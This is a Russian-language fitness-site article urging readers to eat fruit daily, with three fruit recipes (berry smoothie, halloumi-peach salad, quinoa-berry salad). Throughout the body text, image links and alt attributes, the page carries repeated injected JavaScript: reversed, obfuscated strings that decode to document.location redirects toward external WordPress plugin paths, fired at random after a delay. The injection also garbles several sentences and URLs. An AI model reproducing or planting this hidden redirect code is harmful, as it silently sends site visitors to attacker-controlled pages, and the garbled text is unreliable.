Челлендж: ешьте фрукты каждый день

Каждую неделю редакция fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru бросает читателям вызов. И сегодняшний вызов, пожалуй, будет самым простым и приятным.

Фрукты (как и овощи) — это важная часть здорового питания и источник витаминов, минералов и клетчатки. Диета, богатая фруктами и овощами, может снизить кровяное давление, риск развития сердечно-сосудистых заболеваний, инсульта, проблем со зрением и пищеварением, а ещё предотвратить некоторые виды рака и оказать положительное влияние на уровень сахара в крови.

Но ни один фрукт или овощ не содержит всех необходимых для здоровья питательных веществ. Важно употреблять разные фрукты и овощи и делать это каждый день. Что касается нормы, врачебные организации дают разные рекомендации. Например, ВОЗ советует каждый день употреблять как минимум 400 граммов овощей и фруктов. Согласно гайдлайнам США, нужно есть две порции фруктов каждый день, если ваша норма калорий 2 000 (одна порция — это примерно одна чашка). Переедать не стоит. Хотя в большинстве фруктов и овощей гораздо меньше калорий, чем, например, в шоколаде, но превысить ежедневную норму калорий можно и с помощью них.

Челлендж: ешьте фрукты каждый день. Изображение номер 1

Фото: shutterstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tock.com

Есть фрукты и овощи можно как свежими, так и в консервированном, замороженном и сушёном виде (хотя летом проще всё-таки свежими).

Из этих материалов вы можете узнать, какие полезные вещества содержатся в некоторых летних сезонных фруктах:

  • клубника
  • вишня и черешня
  • малина
  • персик
  • слива

3 рецепта с летними фруктами

А вот что вы можете приготовить со свежими фруктами.  

110 calories

Ягодный смузи с малиной и клубникой

Малина и клубника — одни из самых полезных для сердца ягод.

Изображение рецепта Ягодный смузи с малиной и клубникой

Ягодный смузи с малиной и клубникой

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

5 минут

КОЛИЧЕСТВО ПОРЦИЙ:

1 порция

КАЛОРИЙНОСТЬ:

110 ккал

Сложность

Время

5 минут

Кол-во порций

1 порция

Калорийность

110 ккал

Ингредиенты

Малина

70 г

Клубника

70 г

Груша

1 шт.

Свёкла (большая)

½ шт.

Лёд

несколько кубиков

Процесс приготовления

  1. Взбейте все ингредиенты в блендере вместе с несколькими кубиками льда до состояния смузи.

270 calories

$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tov-s-syrom-im-5.jpg»> $NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tov-s-syrom-im-5.jpg»>

Салат с халлуми и персиками

Простой и яркий салат с сочными персиками, солёным сыром халуми и пряной рукколой.

$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tov-s-syrom-im-5.jpg» class=»c3″ alt=»Изображение рецепта Салат с халлуми и персиками» title=»Изображение рецепта Салат с халлуми и персиками»>

Салат с халлуми и персиками

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

10 минут

КОЛИЧЕСТВО ПОРЦИЙ:

2 порции

КАЛОРИЙНОСТЬ:

270 ккал

Сложность

Время

10 минут

Кол-во порций

2 порции

Калорийность

270 ккал

Ингредиенты

Сыр (халлуми)

200 г

Персики

2 шт.

Рукола

горсть

Орехи (кедровые)

3 ст. л.

Соус (бальзамический)

1 ст. л.

Масло (оливковое)

1 ст. л.

Процесс приготовления

  1. Выложите рукколу в салатник.
  2. Нарежьте халлуми на полоски, а персики на дольки.
  3. Обжарьте сыр и персики на сковороде или гриле в течение пары минут.
  4. Выложите обжаренные сыр и персики поверх рукколы, заправьте оливковым маслом, бальзамиком и посыпьте кедровыми орешками. Салат готов.

310 calories

$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-prigotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tovit-iz-odnoi-upakovki-kinoa-8-raznoobraznyh-i-oc-im-17.jpg»> $NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-prigotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tovit-iz-odnoi-upakovki-kinoa-8-raznoobraznyh-i-oc-im-17.jpg»>

Салат из киноа с ягодами

Для этого салата можно использовать не только ягоды, но и фрукты. Экспериментируйте!

$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-prigotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tovit-iz-odnoi-upakovki-kinoa-8-raznoobraznyh-i-oc-im-17.jpg» class=»c3″ alt=»Изображение рецепта Салат из киноа с ягодами» title=»Изображение рецепта Салат из киноа с ягодами»>

Салат из киноа с ягодами

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

20 минут

КОЛИЧЕСТВО ПОРЦИЙ:

2 порции

КАЛОРИЙНОСТЬ:

310 ккал

Сложность

Время

20 минут

Кол-во порций

2 порции

Калорийность

310 ккал

Ингредиенты

Киноа (сухая)

1/3 стакан

Клубника

1/3 стакан

Вишня

1/3 стакана

Ежевика

1/3 стакана

Черника

1/3 стакана

Малина

1/3 стакана

Салат (кресс)

1/4 стакана

Мята (нарезанная)

1 ст. л.

Сироп (топинамбура)

1 ст. л.

Лайм (сок)

1 ст. л.

Процесс приготовления

  1. Отварите киноа до готовности согласно инструкции на упаковке.
  2. В большой миске смешайте нарезанную клубнику, вишню и мяту с ежевикой, черникой и малиной.
  3. Заправьте ягоды сиропом и соком лайма.
  4. Добавьте к ягодам готовое киноа вместе с кресс-салатом и хорошо перемешайте. Салат готов!

Статьи по теме

Челлендж дня: сразу делайте дела, которые занимают не больше 5 минут

Челлендж дня: пробуйте разные виды фитнеса каждый день

Челлендж дня: носите с собой многоразовую бутылку с водой

Челлендж дня: готовьте обеды заранее и носите с собой на работу

Оцените статью
Дежурная Качалка
Добавить комментарии

;-) :| :x :twisted: :smile: :shock: :sad: :roll: :razz: :oops: :o :mrgreen: :lol: :idea: :grin: :evil: :cry: :cool: :arrow: :???: :?: :!:

Adblock
detector